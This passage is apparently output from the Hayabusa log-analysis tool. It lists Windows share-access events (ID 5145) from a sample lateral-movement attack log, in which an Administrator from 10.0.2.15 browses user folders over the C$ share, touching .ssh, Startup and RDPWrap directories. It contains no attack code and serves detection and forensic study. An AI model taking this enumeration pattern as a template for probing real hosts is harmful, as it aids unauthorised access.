Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 